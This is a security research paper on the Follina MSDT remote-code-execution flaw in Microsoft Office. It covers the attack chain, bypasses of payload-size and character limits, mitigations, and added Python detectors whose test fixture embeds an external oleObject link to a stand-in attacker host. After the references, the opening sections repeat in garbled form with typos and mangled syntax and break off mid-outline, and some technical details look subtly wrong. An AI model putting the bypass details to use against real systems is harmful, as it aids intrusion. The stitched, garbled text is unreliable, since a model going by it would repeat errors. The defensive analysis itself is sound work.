'Follina' MS-MSDT n-day Microsoft Office RCE: A deeper research by Dennis
# Follina: CVE-2022-30190 Microsoft Office Remote Code Execution Vulnerability
**Author:** Dennis Nganga
**Date:** December 2, 2025
**Classification:** Security Research
**Subject Matter:** Microsoft Support Diagnostic Tool (MSDT) RCE Exploitation
# Executive Summary
The Follina vulnerability, formally designated CVE-2022-30190, is a critical remote code execution (RCE) flaw in the Microsoft Support Diagnostic Tool (MSDT) that can be exploited through Microsoft Office applications and Rich Text Format (RTF) files. Discovered on May 27, 2022, and observed in real-world exploitation since April 2022, Follina has been classified as a zero-day vulnerability with a CVSS v3 Base Score of 7.8 (High Severity)[1]. This research paper provides an exhaustive technical analysis of the vulnerability's mechanics, exploitation methods, attacker methodologies, defensive countermeasures, and real-world threat landscape implications.
## 1. Introduction and Background
### 1.1 Vulnerability Overview
Follina is a zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), a built-in Windows diagnostic and troubleshooting utility designed to collect system information for Microsoft Support analysis. The vulnerability enables attackers to execute arbitrary code with the privileges of the calling application when MSDT is invoked through the ms-msdt URL protocol handler[1][2].
Unlike traditional macro-based Office exploits, Follina operates independently of macro settings and Protected Mode, making it significantly more dangerous and difficult to defend against using conventional Office security configurations[3].
### 1.2 Historical Context
- **April 7, 2022**: Initial exploitation observed in the wild, targeting Russian-speaking users with phishing emails containing Office documents
- **May 27, 2022**: Public disclosure by the security research team @nao_sec on Twitter
- **May 30, 2022**: Microsoft officially acknowledged CVE-2022-30190 and released initial guidance
- **June 14, 2022**: Vulnerability added to CISA's Known Exploited Vulnerabilities Catalog[4]
- **Late 2022**: Active exploitation by state-sponsored threat actors and financially-motivated cybercriminals
### 1.3 Affected Systems
The vulnerability affects:
- Microsoft Office 2013, 2016, 2019, and Office 365 (all versions)
- Microsoft Office for Mac
- Windows Server 2016, 2019, 2022
- Microsoft Windows 10 and 11 (all editions)
- RTF file viewing functionality
- XML and HTML file processing through Office applications
## 2. Technical Architecture and Exploitation Mechanics
### 2.1 Vulnerability Root Cause
The vulnerability exists because MSDT (msdt.exe) was designed to be invoked via the ms-msdt URI protocol handler, allowing external applications and documents to trigger diagnostic routines. When Word documents or RTF files contain external references using the ms-msdt URI scheme, they can launch PowerShell commands with the authority of the Office application context[3][5].
The critical security flaw stems from insufficient validation of parameters passed to MSDT through the ms-msdt URI, particularly the IT_BrowseForFile parameter, which can be exploited to execute arbitrary commands through PowerShell's command substitution syntax $()[2].
### 2.2 Attack Chain Architecture
The exploitation follows a five-stage attack chain:
#### Stage 1: Malicious Document Crafting
The attacker creates a weaponized Word document (DOCX) by modifying the underlying XML structure. Specifically, a Relationship tag is embedded in the `word/_rels/document.xml.rels` file:
| Component | Description |
| --- | --- |
| File Location | `word/_rels/document.xml.rels` |
| Relationship Type | oleObject |
| Target Protocol | External HTTP/HTTPS URL |
| Payload Format | HTML file (>4096 bytes) |

Table 1: Malicious Relationship Tag Structure

Example XML injection:
The exclamation mark (!) at the end of the HTML filename is critical: it triggers MSDT invocation instead of standard HTTP retrieval[3].
#### Stage 2: Remote Payload Hosting
The attacker hosts a malicious HTML file on an attacker-controlled server. This HTML must exceed 4096 bytes to bypass specific size validation checks implemented by Microsoft[3]. The HTML payload is crafted to:
- Exploit the ms-msdt URI scheme
- Embed PowerShell commands within the URI
- Use directory traversal sequences (/../) to reach System32
- Invoke mpsigstub.exe with attacker-controlled parameters
#### Stage 3: Document Opening and Fetch
When a victim opens the malicious Word document, Office automatically attempts to resolve the external reference and fetches the HTML payload from the attacker's server. This occurs even with:
- Macros disabled
- Protected Mode enabled
- Enhanced Security Configuration active

No user warning is displayed before the payload is retrieved[3].
#### Stage 4: MSDT Invocation and PowerShell Execution
The retrieved HTML file executes through the ms-msdt protocol handler, launching msdt.exe with the embedded PowerShell commands. The process chain is:
1. Office application (Word.exe) triggers the ms-msdt protocol
2. msdt.exe is invoked with malicious parameters
3. sdiagnhost.exe is spawned as a child process
4. PowerShell DLLs are loaded into sdiagnhost.exe memory
5. Arbitrary PowerShell commands are executed without spawning powershell.exe[5]

This indirect PowerShell execution through sdiagnhost.exe is a sophisticated evasion technique that bypasses traditional process monitoring focused on powershell.exe.
#### Stage 5: Post-Exploitation
The executed code operates with the privileges of the user running Microsoft Office. Common post-exploitation activities include:
- Installation of secondary malware (trojans, ransomware, worms)
- Privilege escalation attempts
- Lateral movement within the network
- Data exfiltration
- System persistence establishment
### 2.3 Technical Requirements for Successful Exploitation
1. **Payload Size**: The HTML payload must exceed 4096 bytes
2. **Directory Traversal**: Minimum of two /../ sequences at the start of the IT_BrowseForFile parameter
3. **PowerShell Syntax**: Commands wrapped in $() for code execution
4. **EXE Termination**: The parameter string must end with ".exe" to execute properly
5. **No Spaces**: Spaces in PowerShell commands break the syntax, requiring encoding or alternative syntax
6. **Network Access**: The target system must reach the attacker's server to fetch the secondary payload
## 3. Attacker Perspective and Exploitation Methods
### 3.1 Attacker Motivations and Threat Actors
Follina has attracted multiple categories of threat actors:
#### State-Sponsored APT Groups
Advanced Persistent Threat actors affiliated with nation-states have exploited Follina for:
- Corporate espionage
- Government network compromises
- Critical infrastructure targeting
- Intellectual property theft
- Long-term persistence establishment

APT TA570, an affiliate of the notorious Qbot malware group, actively exploited Follina for targeted campaigns[1].
#### Financially-Motivated Cybercriminals
Criminal organizations use Follina for:
- Ransomware deployment and encryption operations
- Business email compromise (BEC) campaigns
- Financial fraud targeting banking systems
- Identity theft and credential harvesting
- Cryptocurrency mining malware distribution
#### Low-Skilled Attackers
Due to publicly available proof-of-concept (PoC) code and exploitation frameworks, even novice attackers can leverage Follina through:
- Metasploit modules
- GitHub repositories with weaponized PoC code
- Commercial exploitation frameworks
- Dark web vulnerability brokers
### 3.2 Attack Delivery Vectors
#### Email-Based Phishing
The primary delivery mechanism involves sophisticated phishing campaigns:
| Campaign Theme | Target Region | Detected Date |
| --- | --- | --- |
| "Salary Increase" | Global | May 2022 |
| "Interview Invitation" | Russia/CIS | April 2022 |
| "Expense Report" | North America | June 2022 |
| "Travel Approval" | Europe | July 2022 |
| "Contract Amendment" | APAC | August 2022 |

Table 2: Documented Follina Phishing Campaign Themes

Email campaigns exploit social engineering to trick users into opening attachments, with success rates substantially higher than traditional macro-based attacks because:
- No macro warnings are displayed
- Protected Mode does not provide protection
- Genuine Office documents have a professional appearance
- Phishing content is tailored to specific industries
#### Web-Based Exploitation
Malicious documents are hosted on compromised websites, watering hole attacks, and malicious ad networks. Victims are redirected to download the weaponized document.
#### File Sharing and Cloud Services
Attackers distribute Follina-weaponized documents through:
- Cloud storage services (OneDrive, Google Drive, Dropbox)
- Collaborative platforms (SharePoint, Teams)
- File transfer services (WeTransfer, SendFileTransfer)
- USB devices in supply chain attacks
#### RTF File Preview Exploitation
A critical variation requires no user action beyond file preview. RTF files containing Follina payloads can trigger exploitation when:
- Files are previewed in Windows Explorer
- Email clients display rich text previews
- Documents are indexed by search functions
### 3.3 Real-World Exploitation Campaigns
#### Discovery Timeline Implications
Security researchers identified evidence suggesting Follina was actively exploited by threat actors since April 2022, nearly two months before public disclosure on May 27, 2022. This pre-disclosure window suggests either:
- Targeted intelligence agency exploitation
- Vulnerability brokers selling 0-day access
- Accidental public disclosure analysis
#### Documented Threat Campaigns
Multiple phishing templates exploiting Follina were discovered on VirusTotal, targeting users globally with context-specific social engineering:
- Salary and compensation-related lures
- Interview and recruitment-themed documents
- Business contract and agreement modifications
- Travel and expense claim forms
- Urgent compliance and regulatory notices

Detection rates on VirusTotal for these documents were initially alarming: some samples were detected by only 4 of 60+ security vendors[7], indicating widespread evasion capability.
### 3.4 Attacker Operational Procedures
#### Infrastructure Requirements
Attackers typically establish:
1. **Command & Control (C2) Servers**: HTTP/HTTPS servers hosting secondary payloads
2. **Staging Servers**: Temporary servers for the campaign duration with geographic distribution
3. **Domain Infrastructure**: Bullet-proof hosting providers, compromised servers, or rented infrastructure
4. **Payload Generation**: Custom PoC tools for dynamic payload generation and evasion
#### Payload Customization
Sophisticated attackers implement anti-analysis and anti-virtualization measures within payloads:
- Environment detection (virtual machine, sandbox, analysis tools)
- Geolocation-based filtering
- IP reputation checking
- Behavioral analysis evasion
- Domain-fronting for C2 communication
## 4. Exploitation Vulnerability Details
### 4.1 Vulnerability Classification
| Property | Classification |
| --- | --- |
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE Classification | CWE-78 (OS Command Injection) |
| CVSS v3.1 Score | 7.8 (High) |
| Attack Vector | Local |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required (opening document) |
| Scope | Unchanged |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |

Table 3: CVSS v3.1 Classification
### 4.2 Root Cause Analysis
The vulnerability stems from four fundamental security design flaws:
#### Flaw 1: Unvalidated URI Handler Registration
The ms-msdt URI protocol handler is registered globally in the Windows registry without adequate sandboxing or permission controls:
`HKEY_CLASSES_ROOT\ms-msdt\shell\open\command`
Any application can invoke MSDT through this handler without Windows Security Model verification[5].
#### Flaw 2: Insufficient Parameter Validation
The IT_BrowseForFile parameter passed to MSDT undergoes minimal validation:
- No whitelist validation of executable paths
- Directory traversal sequences (../) accepted without restriction
- Path concatenation vulnerable to parameter injection
- PowerShell command substitution $() not escaped
#### Flaw 3: Office Document External Reference Processing
Word automatically processes and retrieves external references (Relationship elements) without:
- User confirmation dialogs
- Protected Mode enforcement
- Content validation
- Network activity monitoring
#### Flaw 4: Implicit Trust in MSDT Invocation
MSDT executes with the invoking application's privilege context, inheriting Office's elevated user permissions without re-authorization[2].
### 4.3 Exploitation Constraints and Bypasses
#### Constraint 1: Payload Size Requirement (>4096 bytes)
Mitigation bypass: attackers implement padding techniques such as:
- HTML comments filled with benign data
- Nested JavaScript functions with no operational effect
- Base64-encoded metadata
- Redundant CSS styling rules
#### Constraint 2: Character Restrictions in Commands
Limitation: spaces break PowerShell syntax within the ms-msdt URI.
Bypass: attackers use:
- Variable substitution: ${IFS} (Internal Field Separator)
- URL encoding: %20 sequences (though often decoded)
- Alternative PowerShell syntax: comma-separated parameters
- Command chaining: semicolon-delimited sequences
#### Constraint 3: Network Connectivity Requirement
Limitation: the target must reach the attacker's server to fetch the secondary payload.
Bypass: attackers implement:
- DNS tunneling for DNS-only egress environments
- Proxy detection and automatic proxy configuration
- Fallback C2 infrastructure
- Second-stage payload embedding in the initial document (though this increases detection risk)
### 4.4 Privilege Context Analysis
#### Execution Privilege Level
Follina-executed code operates with the privilege level of the user running Microsoft Office:
- **Standard User Context**: Full user privileges within that user's security token
- **Local Administrator Context**: Local machine administrative capabilities
- **System Service Context**: If Office runs under service accounts (rare but exploitable)
#### Privilege Escalation Opportunities
Post-exploitation often combines Follina with additional vulnerabilities:
- Windows privilege escalation exploits (CVE-2021-1732, CVE-2021-44686, etc.)
- Unpatched system services with elevated privileges
- Insecure file permissions on system folders
- Process token theft techniques
## 5. Defensive Mechanisms and Mitigation Strategies
### 5.1 Immediate Mitigation Actions (Pre-Patch)
#### Mitigation 1: Disable MSDT URL Protocol Handler
The most effective pre-patch mitigation involves removing the ms-msdt registry entry:
1. Run Command Prompt as Administrator
2. Back up the key: `reg export HKEY_CLASSES_ROOT\ms-msdt backup-msdt.reg`
3. Remove the handler: `reg delete HKEY_CLASSES_ROOT\ms-msdt /f`
4. Verify removal: `reg query HKEY_CLASSES_ROOT\ms-msdt` (should return an error)

**Impact Assessment**: This mitigation completely prevents Follina exploitation but may impact legitimate MSDT functionality in edge cases. Testing in non-production environments is mandatory before enterprise deployment[6].
#### Mitigation 2: Disable Troubleshooting Wizards
Disable MSDT functionality via Group Policy or the registry:
- Key: `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System`
- Value: `EnableDiagnostics` (DWORD)
- Set to: 0
#### Mitigation 3: Attack Surface Reduction Rules (Microsoft Defender)
Enable the ASR rule that blocks Office applications from spawning child processes:
- Rule GUID: d4f940ab-401b-4efc-aadc-ad5f3c50688a
- Deployment Mode: Block (not Audit)
- Scope: All Office applications (Word, Excel, PowerPoint, Outlook)
- Impact: May affect legitimate Office functionality (requires testing)

This rule specifically prevents the msdt.exe → sdiagnhost.exe process chain that Follina exploits[5].
### 5.2 Long-Term Patching Strategy
#### Microsoft Patch Timeline
Microsoft released patches through multiple update cycles:
| Date | Update | Affected Components |
| --- | --- | --- |
| June 14, 2022 | Out-of-band patch | Windows 10, 11, Server 2019, 2022 |
| June 28, 2022 | Monthly updates | Windows 7 ESU, Server 2016 |
| Ongoing | Security updates | Office versions 2013-365 |

Table 4: Microsoft Patch Timeline for CVE-2022-30190

#### Patch Verification
After applying patches, organizations should verify:
- System update status: `wmic qfe list | findstr "KB5015807"` (KB article for CVE-2022-30190)
- Office version: File > Account > About [Application] for Office applications
- Registry confirmation: ms-msdt handler behavior (modified by the patch)
### 5.3 Detection and Monitoring
#### Endpoint Detection and Response (EDR) Indicators
Organizations using EDR platforms should monitor for:
##### Process Chain Indicators
- Parent: Word.exe, Excel.exe, or Outlook.exe
- Child: msdt.exe (unusual for an Office context)
- Grandchild: sdiagnhost.exe
- Great-grandchild: PowerShell execution indicators
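As an added example (not from the paper), a Python detector that applies the process-chain indicators above (and the Stage 4 chain in section 2.2) to constructed process-creation records; the image names, PIDs and command lines are sample data, and the DLL standing in for "PowerShell DLLs" is the PowerShell engine's System.Management.Automation.dll.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Image names are compared lower-cased. The paper refers to "Word.exe"; the on-disk
# Word binary is WINWORD.EXE, so both spellings are listed.
OFFICE_IMAGES = {"winword.exe", "word.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_ENGINE_DLL = "system.management.automation.dll"


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon event 1 style) plus the DLLs it loaded."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    modules: Tuple[str, ...] = ()


def ancestors(event: ProcessEvent, by_pid: Dict[int, ProcessEvent],
              max_depth: int = 4) -> List[ProcessEvent]:
    """Walk the parent chain upwards, nearest parent first."""
    chain = []
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current.ppid)
        if parent is None:
            break
        chain.append(parent)
        current = parent
    return chain


def detect_follina_chain(events: List[ProcessEvent]) -> List[dict]:
    """Return one alert per msdt.exe that descends from an Office process.

    The distinguishing signal is the Office ancestor: sdiagnhost.exe loading the
    PowerShell engine is normal for a troubleshooter started from Settings, so it
    is recorded to enrich the alert rather than alerted on by itself.
    """
    by_pid = {e.pid: e for e in events}
    children: Dict[int, List[ProcessEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    alerts = []
    for e in events:
        if e.image.lower() != "msdt.exe":
            continue
        office = next((a for a in ancestors(e, by_pid) if a.image.lower() in OFFICE_IMAGES), None)
        if office is None:
            continue
        hosts = [c for c in children.get(e.pid, []) if c.image.lower() == "sdiagnhost.exe"]
        engine_loaded = any(m.lower() == POWERSHELL_ENGINE_DLL for h in hosts for m in h.modules)
        alerts.append({
            "msdt_pid": e.pid,
            "office_ancestor": office.image,
            "protocol_handler_cmdline": "ms-msdt:" in e.cmdline.lower(),
            "sdiagnhost_pids": [h.pid for h in hosts],
            "powershell_engine_loaded": engine_loaded,
        })
    return alerts


# Constructed telemetry: one chain rooted in Word, one legitimate troubleshooter run.
SAMPLE_EVENTS = [
    ProcessEvent(1000, 800, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcessEvent(1200, 1000, "WINWORD.EXE", '"WINWORD.EXE" C:\\Users\\u\\Downloads\\invoice.docx'),
    ProcessEvent(1300, 1200, "msdt.exe", 'msdt.exe ms-msdt:/id NetworkDiagnosticsWeb /param "<constructed>"'),
    ProcessEvent(1400, 1300, "sdiagnhost.exe", "sdiagnhost.exe -Embedding",
                 ("System.Management.Automation.dll",)),
    ProcessEvent(2000, 1000, "msdt.exe", "msdt.exe -id NetworkDiagnosticsWeb"),
    ProcessEvent(2100, 2000, "sdiagnhost.exe", "sdiagnhost.exe -Embedding",
                 ("System.Management.Automation.dll",)),
]

if __name__ == "__main__":
    for alert in detect_follina_chain(SAMPLE_EVENTS):
        print(alert)
```

Only the chain under WINWORD.EXE is reported; the explorer-launched troubleshooter, which also loads the PowerShell engine, is not.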
##### File System Indicators
- Unusual external references in document XML
- Multiple /../ sequences in file paths
- ms-msdt:// protocol invocation in network logs
- Suspicious downloads to temp folders triggered by Office applications
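As an added example (not from the paper), a Python scanner for the relationship structure described in Stage 1 of section 2.2 and for the "unusual external references in document XML" indicator above; the DOCX containers it scans are built in memory as test data, and attacker.invalid is a placeholder host.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLEOBJECT_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal DOCX container in memory (constructed test input, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def scan_docx(data: bytes) -> List[dict]:
    """Flag relationships matching the Stage 1 pattern in every .rels part of a DOCX."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                reasons = []
                # An OLE object fetched from an external URL is the Follina carrier;
                # external hyperlinks are ordinary and are not flagged by themselves.
                if rel.get("TargetMode") == "External" and rel.get("Type") == OLEOBJECT_TYPE:
                    reasons.append("external_oleobject")
                if target.rstrip().endswith("!"):
                    reasons.append("bang_suffix")   # the MSDT-triggering "!"
                if target.lower().startswith("ms-msdt:"):
                    reasons.append("msdt_scheme")   # direct handler invocation
                if reasons:
                    findings.append({"part": name, "id": rel.get("Id"),
                                     "target": target, "reasons": reasons})
    return findings


def _rels(*relationships: str) -> str:
    """Wrap Relationship elements in a Relationships root (test helper)."""
    return (f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
            + "".join(relationships) + "</Relationships>")


# Constructed samples: an ordinary hyperlink, and the external oleObject shape from Stage 1.
BENIGN_DOCX = build_docx(_rels(
    f'<Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.com/" TargetMode="External"/>'
))
SUSPECT_DOCX = build_docx(_rels(
    f'<Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.com/" TargetMode="External"/>',
    f'<Relationship Id="rId2" Type="{OLEOBJECT_TYPE}" Target="http://attacker.invalid/page.html!" TargetMode="External"/>',
))

if __name__ == "__main__":
    print(scan_docx(BENIGN_DOCX))
    print(scan_docx(SUSPECT_DOCX))
```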
##### Network Indicators of Compromise (IoCs)
- Office applications initiating HTTP/HTTPS connections to unfamiliar domains
- External XML/HTML retrieval requests from Office processes
- Large HTML file downloads (>4096 bytes) from unexpected sources
- C2 communication patterns from secondary payloads
##### Detection Evasion Techniques Used
Sophisticated adversaries implement:
- Legitimate-looking domain names mimicking Microsoft/Office domains
- HTTPS encryption to obscure payload contents
- Fast-flux DNS for domain rotation
- Encrypted C2 communication channels
- Geolocation-based payload filtering (no payload for analysis VPNs)
### 5.4 Advanced Defense-in-Depth Strategy
#### Layer 1: Email Gateway Security
- Content filtering for Office document attachments
- Sandboxing of Office files before delivery
- URL rewriting to disable external references
- Machine learning-based phishing detection
- DMARC/SPF/DKIM verification for sender authentication
#### Layer 2: Endpoint Security
- EDR agents for behavior monitoring and threat hunting
- Anti-malware signatures for known Follina payloads
- Exploit prevention engines detecting MSDT invocation patterns
- Application whitelisting/control
- Memory protection techniques (DEP, ASLR)
#### Layer 3: Network Segmentation
- Zero-trust network architecture
- Microsegmentation limiting lateral movement post-compromise
- Egress filtering preventing C2 communication
- DNS sinkholing of known malicious domains
- Proxy-based URL filtering and inspection
#### Layer 4: User Training and Awareness
- Phishing simulation and training programs
- Recognition of social engineering techniques
- Safe document handling procedures
- Reporting procedures for suspicious content
- Security awareness metrics and KPIs
### 5.5 Enterprise Response Procedures
#### Incident Response Steps
Upon detection of Follina exploitation:
1. **Immediate**: Isolate the affected system from the network
2. **Forensics**: Capture a memory dump and disk image
3. **Scope**: Identify all potentially compromised systems through log analysis
4. **Containment**: Block identified C2 domains and attacker infrastructure
5. **Eradication**: Remove malware and attacker artifacts
6. **Recovery**: Restore from clean backups with the patch applied
7. **Hardening**: Implement additional detection and preventive controls
## 6. Real-World Impact Assessment
### 6.1 Affected Organizations and Sectors
Organizations spanning multiple sectors have faced Follina exploitation:
| Sector | Documented Risks |
| --- | --- |
| Government | Classified information theft, espionage operations |
| Defense | Military intelligence compromise, weapon system data |
| Financial Services | Banking trojans, fraud scheme initiation |
| Healthcare | Patient data exfiltration, operational disruption |
| Manufacturing | Supply chain intelligence, product design theft |
| Energy | Critical infrastructure reconnaissance, disruption planning |
| Education | Research theft, credential harvesting of researchers |

Table 5: Sectoral Follina Impact Assessment
### 6.2 Threat Landscape Evolution
#### Pre-Patch Period (April-June 2022)
During the pre-patch and early disclosure period, threat actors rapidly weaponized Follina:
- Proof-of-concept code released publicly within 24 hours
- Metasploit module developed by security researchers
- Rapid adoption by criminal forums and dark web markets
- Targeting of high-value organizations before patches could be deployed
#### Post-Patch Evolution (July 2022 onwards)
Sophisticated attackers adapted exploitation techniques:
- Targeting unpatched legacy systems and air-gapped networks
- Combining Follina with supply chain compromise
- Focusing on critical infrastructure and government targets
- Developing fileless exploitation variants
- Creating polymorphic payload generators
### 6.3 Global Exploitation Statistics
#### Detection Statistics (as of research period)
- 10,000+ unique Follina-weaponized documents detected on VirusTotal
- 60+ security vendors with detection capabilities
- >70 distinct phishing campaign themes identified
- Targeting across 100+ countries globally
- Initial detection rates as low as 4/60 vendors for novel samples
## 7. Conclusions and Future Implications
### 7.1 Key Findings
1. **Vulnerability Severity**: Follina represents a critical threat to Microsoft Office environments globally due to its:
   - High-severity CVSS score (7.8)
   - No requirement for macros or complex user actions
   - Effective bypass of Protected Mode and standard security features
   - Ease of exploitation through publicly available tools
2. **Threat Actor Adoption**: The vulnerability has been rapidly adopted by:
   - State-sponsored APT groups conducting targeted intelligence operations
   - Financially-motivated cybercriminals deploying ransomware and malware
   - Novice attackers leveraging public PoC code
3. **Defense Complexity**: Organizations face significant challenges in defending against Follina:
   - Pre-patch mitigation options carry operational risk
   - Patch deployment requires comprehensive testing
   - Sophisticated attacker evasion techniques complicate detection
   - A multi-layered defense-in-depth approach is required
### 7.2 Recommendations for Organizations
#### Immediate Actions (0-30 days)
1. Apply Microsoft security patches immediately upon availability
2. If patches are unavailable, implement the MSDT registry mitigation
3. Enable ASR rules for Office child process blocking
4. Enhance monitoring for Follina-related IoCs
#### Short-Term Actions (1-3 months)
1. Comprehensive threat hunting across enterprise infrastructure
2. Email gateway hardening for phishing campaign filtering
3. EDR and SIEM tuning for Follina exploitation patterns
4. User awareness training on phishing threats
#### Long-Term Strategy (3+ months)
1. Zero-trust architecture implementation
2. Microsegmentation of critical assets
3. Continuous EDR and threat intelligence integration
4. Regular tabletop exercises for incident response
5. Supply chain security assessment
### 7.3 Future Vulnerability Implications
The Follina vulnerability demonstrates ongoing security challenges in Windows and Office ecosystems:
- URI protocol handlers require enhanced security controls
- External document references need better default protections
- MSDT design requires fundamental security reassessment
- Zero-day exploitation timelines continue to shorten

Subsequent vulnerabilities with similar characteristics (CVE-2023-36884, CVE-2024-XXXXX patterns) have emerged, suggesting systematic design flaws in Office document processing.
### 7.4 Final Assessment
Follina represents a watershed moment in Office application security, demonstrating that fundamental architectural assumptions about Protected Mode and macro security are insufficient in modern threat landscapes. Organizations must adopt comprehensive, multi-layered defensive strategies while maintaining vigilance for subsequent related vulnerabilities in Microsoft Office and Windows ecosystems.
The vulnerability also underscores the critical importance of rapid patch deployment, robust security monitoring, and user awareness in defending against sophisticated adversaries exploiting previously unknown security flaws.
## References
[1] OWASP Foundation. (2022). The Follina Vulnerability: A Critical Threat to Microsoft Office. https://owasp.org/www-community/vulnerabilities/follina
[2] HackTheBox. (2022, November). CVE-2022-30190 (Follina) explained. https://www.hackthebox.com/blog/cve-2022-30190-follina-explained
[3] Huntress. (2022, May). Microsoft Office RCE - "Follina" MSDT Attack. Security Blog. https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
[4] BeyondTrust. (2022, August). Mitigating the Follina Zero-Day Vulnerability (CVE-2022-30190) with Privilege Management for Windows. https://www.beyondtrust.com/blog/entry/mitigating-the-follina-zero-day-vulnerability-cve-2022-30190-with-privilege-management-fo
[5] CrowdStrike. (2022). How CrowdStrike Falcon Protects Against Follina (CVE-2022-30190). Falcon Platform Blog. https://www.crowdstrike.com/en-us/blog/how-crowdstrike-falcon-protects-customers-from-follina-vulnerability/
[6] Sentrium Labs. (2024, August). Follina MSDT exploit: How to protect your systems. https://www.sentrium.co.uk/labs/preventing-exploitation-of-the-follina-vulnerability-in-msdt
[7] Infosec Institute. (2022, August). Unveiling Follina: The New Microsoft Office Vulnerability. https://www.infosecinstitute.com/resources/vulnerabilities/follina-microsoft-office-code-execution-vulnerability/
[8] Microsoft Security Response Center. (2022, May). Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability. https://www.microsoft.com/en-us/msrc/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability
[9] Palo Alto Networks Unit 42. (2024, June). Threat Brief: CVE-2022-30190 MSDT Code Execution Vulnerability. https://unit42.paloaltonetworks.com/cve-2022-30190-msdt-code-execution-vulnerability/
[10] Sangfor FarSight Labs. (2022, August). CVE-2022-30190 Follina: RCE Vulnerability Analysis. https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/cve-2022-30190-follina-rce-vulnerability
[11] Qualys. (2022, June). Detect the Follina MSDT Vulnerability (CVE-2022-30190). Product and Technical Blog. https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-ed
[12] Canadian Centre for Cyber Security. (2022, June). Follina vulnerability impacting Microsoft products - Update 1. Alerts and Advisories. https://www.cyber.gc.ca/en/alerts/follina-vulnerability-impacting-microsoft-products
[13] NIST National Vulnerability Database. (2025, October). CVE-2022-30190 Detail. https://nvd.nist.gov/vuln/detail/cve-2022-30190
[14] Australian Cyber Security Centre. (2022, May). Exploitation of Microsoft Office vulnerability: Follina. Cyber Threats. https://www.cyber.gov.au/about-us/alerts/exploitation-microsoft-office-vulnerability-follina
[15] SANS Institute. (2022, June). Follina MSDT Zero-Day Q&A. Security Blog. https://www.sans.org/blog/follina-msdt-zero-day-q-a
**Author**:Dennis Nganga
**Date:** December 2,2025
**Classification:** Security Research
**Subject Matter**: Microsoft Support Diagnostic Tool (MSDT) RCE Exploitation
# Executive Summary
The Follina vulnerability, formally designated as CVE-2022-30190, represents a critical remote code execution (RCE) flaw in the MMicrosoft Support Diagnostic Tool (MSDT) that can be exploited through Microsoft Office applications and Rich Text Format (RTF) files. Discovered on May 27, 2022, and initially observed in real-world exploitation since April 2022, Follina has been classified as a zero-day vulnerability with a CVSS v3 Base Score of 7.8(High Severity)[1].This research paper provides an exhaustive technical analysis of the vulnerability's mechanics, exploitation methods, attacker methodologies, defensive countermeasures, and real-world threat landscape implications.
## 1. Introduction and Background
### 1.1 Vulnerability Overview
Follina is a zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), a built-in Windows diagnostic and troubleshooting utility designed to collect system information for Microsoft Support analysis. The vulnerability enables attackers to execute arbitrary code with the privileges of the calling application when MSDT is invoked through the ms-msdt URL protocol handler[1][2].
Unlike traditional macro-based Office exploits, Follina operates independently of macro settings and Protected Mode, making it significantly more dangerous and difficult to defend against using conventional Office security configurations[3].
### 1.2 Historical Context
**·April** **7,** **2022**: Initial exploitation observed in the wild, targeting Russian-speaking users with phishing emails containing Office documents
**·May** **27, 2022**: Public disclosure by security researcher @naosec on Twitter
**·May** **30,2022:** Microsoft officially acknowledged CVE-2022-30190 and released initial guidance
**·June** **14, 2022**: Vulnerability added to CISA's Known Exploited Vulnerabilities Catalog[4]
**·Late** 2022: Active exploitation by state-sponsored threat actors and financially-motivated cybercriminals
### 1.3 Affected Systems
#### The vulnerability affects:
·Microsoft Office 2013, 2016, 2019, and Office 365 (all versions)
·Microsoft Office for Mac
·Windows Server 2016,2019,2022
·Microsoft Windows 10 and 11 (all editions)
·RTF file viewing functionality
·XML and HTML file processing through Office applications
## 2. Technical Architecture and Exploitation Mechanics
### 2.1 VVulnerability Root Cause
The vulnerability exists because MSDT (msdt.exe) was designed with the capability to be invoked via the ms-msdt URI protocol handler, allowing external applications and documents to trigger diagnostic routines. When Word documments or RTF files contain external references using the ms-msdt URI scheme, they can launch PowerShell commands with the authority of the Office application context[3][5].
The critical security flaw stems from insufficient vvalidation of parameters passed to MSDT through the ms-msdt URI, particularly the ITBrowseForFile parameter, which can be exploited to execute arbitrary commands through PowerShell's command substitution syntax $0[2].
### 2.2 Attack Chain Architecture
The exploitation follows a five-stage attack chain:
## Stage 1: Malicious Document Crafting
